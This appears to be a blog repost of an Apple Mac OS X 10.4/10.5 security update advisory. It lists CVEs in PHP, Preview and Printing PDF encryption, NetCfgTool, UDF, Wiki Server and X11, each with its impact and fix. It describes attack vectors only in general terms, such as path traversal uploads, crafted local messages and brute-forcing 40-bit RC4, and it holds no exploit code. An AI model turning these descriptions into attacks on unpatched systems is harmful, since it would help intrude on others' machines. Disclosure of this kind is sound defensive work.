CVE-ID: CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768, CVE-2007-4887

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in PHP 5.2.4

Description: PHP is updated to version 5.2.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/ PHP version 5.2.x is only provided with Mac OS X v10.5 systems.

PHP

CVE-ID: CVE-2007-3378, CVE-2007-3799

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in PHP 4.4.7

Description: PHP is updated to version 4.4.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/

Podcast Producer

CVE-ID: CVE-2008-0993

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Podcast Capture exposes passwords to other local users

Description: The Podcast Capture application provides passwords to a subtask through the arguments, potentially exposing the passwords to other local users. This update corrects the issue by providing passwords to the subtask through a pipe. This issue does not affect systems prior to Mac OS X v10.5. Credit to Maximilian Reiss of Chair for Applied Software Engineering, TUM for reporting this issue.

Preview

CVE-ID: CVE-2008-0994

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Saving to encrypted PDF in Preview produces files that may be read without the password

Description: When Preview saves a PDF file with encryption, it uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4.

Printing

CVE-ID: CVE-2008-0995

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Printing to encrypted PDF produces files that may be read without the `open' password

Description: Printing to a PDF file and setting an 'open' password uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4. This issue does not affect systems prior to Mac OS X v10.5.

Printing

CVE-ID: CVE-2008-0996

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Printing to an authenticated print queue may disclose login credentials

Description: An information disclosure issue exists in the handling of authenticated print queues. When starting a job on an authenticated print queue, the credentials used for authentication may be saved to disk. This update addresses the issue by removing user credentials from printing presets before saving them to disk. This issue does not affect systems prior to Mac OS X v10.5.

System Configuration

CVE-ID: CVE-2008-0998

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A local user may be able to execute arbitrary code with system privileges

Description: The privileged tool NetCfgTool uses distributed objects to communicate with untrusted client programs on the local machine. By sending a maliciously crafted message, a local user can bypass the authorization step and may cause arbitrary code execution with the privileges of the privileged program. This update addresses the issue by performing additional validation of distributed objects.

UDF

CVE-ID: CVE-2008-0999

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Opening a maliciously crafted disk image may lead to an unexpected system shutdown

Description: A null pointer dereference issue exists in the handling of Universal Disc Format (UDF) file systems. By enticing a user to open a maliciously crafted disk image, an attacker may cause an unexpected system shutdown. This update addresses the issue through improved validation of UDF file systems. This issue does not affect systems prior to Mac OS X v10.5. Credit to Paul Wagland of Redwood Software, and Wayne Linder of Iomega for reporting this issue.

Wiki Server

CVE-ID: CVE-2008-1000

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A user with access to edit wiki content may be able to execute arbitrary commands as the wiki server

Description: A path traversal issue exists in the Mac OS X v10.5 Server Wiki Server. Attackers with access to edit wiki content may upload files that leverage this issue to place content wherever the wiki server can write, which may lead to arbitrary code execution with the privileges of the wiki server. This update addresses the issue through improved file name handling. This issue does not affect systems prior to Mac OS X v10.5. Credit to Rodrigo Carvalho, from the Core Security Consulting Services (CSC) team of CORE Security Technologies.

X11

CVE-ID: CVE-2007-4568, CVE-2007-4990

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Multiple Vulnerabilities in X11 X Font Server (XFS) 1.0.4

Description: Multiple vulnerabilities exist in X11 X Font Server (XFS) 1.0.4, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to version 1.0.5. Further information is available via the X.Org website at http://www.x.org/wiki/Development/Security These issues are already addressed in systems running Mac OS X v10.5.2.

X11

CVE-ID: CVE-2006-3334, CVE-2006-5793, CVE-2007-2445, CVE-2007-5266, CVE-2007-5267, CVE-2007-5268, CVE-2007-5269

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in X11's libpng 1.2.8

Description: The PNG reference library (libpng) is updated to version 1.2.24 to address several vulnerabilities, the most serious of which may lead to a remote denial of service or arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html This issue affects libpng within X11. It does not affect systems prior to Mac OS X v10.5.

X11

CVE-ID: CVE-2007-5958, CVE-2008-0006, CVE-2007-6427, CVE-2007-6428, CVE-2007-6429

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in the X11 server

Description: Numerous vulnerabilities in the X11 server allow execution of arbitrary code with the privileges of the user running the X11 server if the attacker can authenticate to the X11 server. This is a security vulnerability only if the X11 server is configured to not require authentication, which Apple does not recommend. This update fixes the issue by applying the updated X.Org patches. Further information is available via the X.Org website at http://www.x.org/wiki/Development/Security

Go update!

Joel Esler
http://www.joelesler.net